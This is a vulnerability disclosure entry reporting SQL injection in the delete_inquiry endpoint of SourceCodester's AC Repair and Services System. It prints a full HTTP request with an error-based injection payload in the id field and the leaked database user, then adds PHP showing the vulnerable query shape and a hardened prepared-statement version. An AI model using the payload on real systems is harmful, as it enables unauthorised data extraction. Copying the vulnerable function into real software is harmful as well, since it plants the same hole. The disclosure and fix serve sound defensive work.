| Title | SourceCodester AC Repair and Services System sql injection in Master.php |
|---|
| Description | I found a SQL injection vulnerability in the SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).
This affects the file /classes/Master.php?f=delete_inquiry:
POST /php-acrss/classes/Master.php?f=delete_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278
Content-Length: 913
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking
Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="id"
1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="fullname"
111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="contact"
111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="address"
111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="services[]"
1
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="status"
0
-----------------------------2854294418240524322736048278--
It returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This return value undoubtedly proves the existence of an SQL injection vulnerability here.
The vulnerability arises from the usage of the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without implementing adequate filtering on the controllable parameter id. This absence of proper filtering exposes the possibility of SQL injection attacks. To address this issue, my recommendation is to safeguard the id parameter against malicious exploitation by utilizing mysqli_real_escape_string(). |
|---|
| Source | https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html |
|---|
| User | L2ncE (UID 50751) |
|---|
| Submission | 14/07/2023 05:29 (3 years ago) |
|---|
| Moderated | 15/07/2023 09:29 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 234223 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_inquiry ID sql injection] |
|---|
| Points | 20 |
|---|
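The query shape quoted in the submission, `UPDATE inquiry_list set {data} where id = '{$id}'`, next to a parameterised rewrite, as an added example that is not code from the SourceCodester project. The injected `id` value closes the single-quoted literal and the trailing `#` comments out the remainder of the statement, so `extractvalue()` runs and its error text (containing `user()`) is returned to the client exactly as the page shows. The hardened form uses a prepared statement and integer validation instead of the `mysqli_real_escape_string()` the submitter suggests, because the `{data}` portion is also interpolated into the statement and identifiers cannot be escaped as string literals. Assumptions for illustration: `$conn` is a connected `mysqli` handle, the SET clause is assembled from the other form fields (the page does not show how `{data}` is built), and the column allowlist is taken from the form field names in the captured request.

```php
<?php
// Added example, not the project's code. Assumed: $conn is a connected mysqli
// handle pointed at a database containing the inquiry_list table.

// VULNERABLE: the shape quoted in the submission. $id and every field value are
// concatenated straight into the statement. A POST body with
//   id = 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
// produces
//   UPDATE inquiry_list set ... where id = '1' or (extractvalue(...))#'
// and the XPATH error string carrying user() is echoed back to the caller.
function delete_inquiry_vulnerable(mysqli $conn, string $id, array $fields): array
{
    $parts = [];
    foreach ($fields as $column => $value) {
        // Assumed: how {data} is assembled is not shown on the page.
        $parts[] = " {$column} = '{$value}' ";
    }
    $data = implode(', ', $parts);
    $sql  = "UPDATE inquiry_list set {$data} where id = '{$id}' ";

    if ($conn->query($sql) === false) {
        // Returning the driver error is what turns a syntax error into a data leak.
        return ['status' => 'failed', 'error' => $conn->error];
    }
    return ['status' => 'success'];
}

// HARDENED: column names come only from an allowlist (identifiers cannot be
// bound as parameters), values and the id are bound, and id must be an integer.
function delete_inquiry_safe(mysqli $conn, array $post): array
{
    // Column names assumed from the form field names in the captured request.
    $allowedColumns = ['fullname', 'email', 'contact', 'address', 'status'];

    $sets   = [];
    $values = [];
    foreach ($allowedColumns as $column) {
        if (array_key_exists($column, $post) && is_scalar($post[$column])) {
            $sets[]   = "`{$column}` = ?";
            $values[] = (string) $post[$column];
        }
    }
    if ($sets === []) {
        return ['status' => 'failed', 'error' => 'no updatable fields supplied'];
    }

    // Reject anything that is not a plain integer before it gets near the query.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || $id === null) {
        return ['status' => 'failed', 'error' => 'invalid id'];
    }

    $sql  = 'UPDATE inquiry_list SET ' . implode(', ', $sets) . ' WHERE id = ?';
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        // Log $conn->error server-side; never return driver errors to the client.
        return ['status' => 'failed', 'error' => 'database error'];
    }

    $types    = str_repeat('s', count($values)) . 'i';
    $values[] = $id;
    $stmt->bind_param($types, ...$values);
    $ok = $stmt->execute();
    $stmt->close();

    return $ok ? ['status' => 'success']
               : ['status' => 'failed', 'error' => 'database error'];
}

// Usage (assumes $conn has already been created with new mysqli(...)):
// $result = delete_inquiry_safe($conn, $_POST);
// header('Content-Type: application/json');
// echo json_encode($result);
```

With the prepared statement, the payload from the submission is bound as the value compared against `id`; it never reaches the SQL parser as syntax, and since it fails `FILTER_VALIDATE_INT` the request is rejected before any query is built. The generic error strings also remove the second half of the issue on the page: the error-based extraction only works because the raw driver message is serialised into the JSON response.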